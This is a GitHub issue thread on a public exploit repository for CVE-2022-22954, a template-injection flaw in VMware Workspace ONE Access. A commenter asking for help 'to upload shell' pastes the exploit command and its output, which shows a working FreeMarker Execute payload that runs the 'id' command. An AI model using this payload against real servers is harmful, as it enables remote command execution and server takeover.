bewhale / CVE-2022-22954

CVE-2022-22954 VMware Workspace ONE Access freemarker SSTI 漏洞 命令执行、批量检测脚本、文件写入
69 stars 21 forks source link

bug #1

Open AhrimanSefid opened 2 years ago

AhrimanSefid commented 2 years ago

Hi Can Help For Fixed Error and upload shell.

CVE-2022-22954$ python3 CVE-2022-22954.py -u https://0.0.0.0 -c "id"


/ / | / / / | \ / __ | \ | | \/ \/ __/ // / / / | | / / /____/ // / / // // /____/ // / // / \/ // /_ / / | |/ / /// // /_/ / // /___/ // /__, // / / ____/ |// //\/// ///____// /_/

                                                               - by bewhale

[+] https://0.0.0.0 is vul! ${\"freemarker.template.utility.Execute\"?new()(\"id\")}

AhrimanSefid commented 2 years ago

image

lolminerxmrig commented 2 years ago

Hi Me too Try.

image